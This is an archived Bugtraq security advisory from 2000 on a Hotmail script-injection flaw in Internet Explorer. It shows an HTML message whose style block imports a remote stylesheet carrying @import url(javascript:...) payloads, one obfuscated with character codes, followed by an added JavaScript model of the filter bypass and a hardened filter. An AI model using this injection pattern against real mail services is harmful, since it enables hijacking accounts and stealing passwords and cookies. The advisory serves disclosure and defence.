Bugtraq mailing list archives
Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)"
From: joro () NAT BG (Georgi Guninski)
Date: Mon, 24 Apr 2000 16:09:18 +0300
Georgi Guninski security advisory #11, 2000

Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)"

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Hotmail allows executing JavaScript code in email messages using "@import url(http://host/hostile.css)", which may compromise the user's Hotmail mailbox when the message is viewed with Internet Explorer.

Details:
Several months ago, in my Advisory #3, 2000, I alerted about a Hotmail bug with "@import url(javascript:...)". It was fixed, but now I have found a similar bug.

There is a new security flaw in Hotmail which allows injecting and executing JavaScript code in an email message using the <STYLE> tag, @import and the "javascript:" protocol. This exploit works on Internet Explorer.

Hotmail tries to filter JavaScript code for security reasons. Executing JavaScript when the user opens a Hotmail email message allows, for example, displaying a fake login screen where the user enters his password, which is then stolen. I don't want to make a scary demonstration, but it is also possible to read the user's messages, to send messages in the user's name and to do other mischief. It is also possible to get the user's Hotmail cookie, which is dangerous.

Hotmail deliberately escapes all the JavaScript it can find to prevent such attacks, but obviously there are holes. The message below contains no "javascript:" string at all; the hostile import lives in the remote stylesheet, which IE fetches and follows only when the message is rendered, after Hotmail's filter has already run.

The following JavaScript is executed if embedded in an HTML message:
-------------------------------------------
<STYLE type=text/css>
@import url(http://www.nat.bg/~joro/test.css);
</STYLE>
-------------------------------------------
where http://www.nat.bg/~joro/test.css contains:
-------------------------------------------
@import url(javascript:alert('JavaScript is executed'));
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-------------------------------------------
(The character codes in the second rule decode to alert('Test 1');alert('Test 2');, showing that the payload can be obfuscated so that no recognisable JavaScript appears even in the stylesheet.)

Workaround:
Disable Active Scripting before viewing a Hotmail message, or don't use IE.

NOTE: Do not ask me to crack Hotmail accounts, I do not do that.

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
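The following is an added example, not code from the advisory or from Hotmail: a toy model of why a mail filter that inspects only the message text cannot catch this bypass, and the stricter rule that closes it. The function names, the HOSTED map standing in for the network, the filter regexes and the decoder are all constructed for illustration; only the message body and stylesheet text are taken from the advisory.

```javascript
// Added example (not from Guninski's advisory or Hotmail's code): a toy model of
// why a filter that scans only the message text misses this bypass, and the
// stricter rule that closes it. Names, the HOSTED map and the filter logic are
// constructed for illustration; only the message and stylesheet text come from
// the advisory.

// Constructed: the message body as sent. Note that it contains no "javascript:".
const MESSAGE = `<STYLE type=text/css>
@import url(http://www.nat.bg/~joro/test.css);
</STYLE>`;

// Constructed: what the remote stylesheet serves when IE fetches it at render time.
const REMOTE_CSS = `@import url(javascript:alert('JavaScript is executed'));
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));`;

// Constructed stand-in for the network: URL -> stylesheet body. A filter running
// on the mail server at delivery time has no such view of what a URL will serve.
const HOSTED = { 'http://www.nat.bg/~joro/test.css': REMOTE_CSS };

// Filter in the spirit of the one the advisory says Hotmail had: reject any
// message whose text contains "javascript:". It only ever sees MESSAGE.
function naiveFilterAllows(html) {
  return !/javascript\s*:/i.test(html);
}

// Parse the target of every "@import url(...)" rule. The value may itself
// contain parentheses (javascript:eval(...)), so find the closing paren by
// counting depth instead of using a regex that stops at the first ')'.
function importTargets(css) {
  const targets = [];
  const re = /@import\s+url\(/gi;
  let m;
  while ((m = re.exec(css)) !== null) {
    const start = re.lastIndex;
    let i = start;
    let depth = 1;
    while (i < css.length && depth > 0) {
      if (css[i] === '(') depth++;
      else if (css[i] === ')') depth--;
      i++;
    }
    // i is now just past the ')' that closes url(; drop it and any quotes.
    targets.push(css.slice(start, i - 1).trim().replace(/^['"]|['"]$/g, ''));
    re.lastIndex = i;
  }
  return targets;
}

// Follow @import chains the way the renderer does, collecting every javascript:
// URL that would be executed. The depth cap guards against import loops.
function scriptUrlsAtRenderTime(css, hosted, depth = 0) {
  const found = [];
  if (depth > 4) return found;
  for (const target of importTargets(css)) {
    if (/^javascript:/i.test(target)) {
      found.push(target);
    } else if (Object.prototype.hasOwnProperty.call(hosted, target)) {
      found.push(...scriptUrlsAtRenderTime(hosted[target], hosted, depth + 1));
    }
  }
  return found;
}

// Decode the String.fromCharCode(...) obfuscation in the second payload so the
// real code is visible to an analyst (or to a filter that does see the stylesheet).
function decodeCharCodes(text) {
  const m = /String\.fromCharCode\(([\d,\s]+)\)/.exec(text);
  if (!m) return null;
  return String.fromCharCode(...m[1].split(',').map((n) => parseInt(n, 10)));
}

// Stricter filter: since it cannot know what a URL will serve, remove every
// <style> block, @import rule and url()/expression() value outright rather
// than trying to recognise "javascript:" inside them.
function hardenedFilter(html) {
  return html
    .replace(/<style\b[^>]*>[\s\S]*?<\/style\s*>/gi, '')
    .replace(/@import\b[^;]*;?/gi, '')
    .replace(/\b(?:url|expression)\s*\([^)]*\)/gi, '');
}

console.log('naive filter passes message:', naiveFilterAllows(MESSAGE));
console.log('javascript: URLs run at render time:', scriptUrlsAtRenderTime(MESSAGE, HOSTED));
console.log('decoded payload:', decodeCharCodes(REMOTE_CSS));
console.log('message after hardened filter:', JSON.stringify(hardenedFilter(MESSAGE)));
```

The point the model makes is the one the advisory turns on: naiveFilterAllows(MESSAGE) is true because the string "javascript:" never appears in what the filter sees, yet scriptUrlsAtRenderTime(MESSAGE, HOSTED) returns both payloads because the renderer follows the import to the attacker's host. The only robust fix on the filter side is to refuse external stylesheets and @import entirely, as hardenedFilter does, rather than pattern-matching for the dangerous scheme.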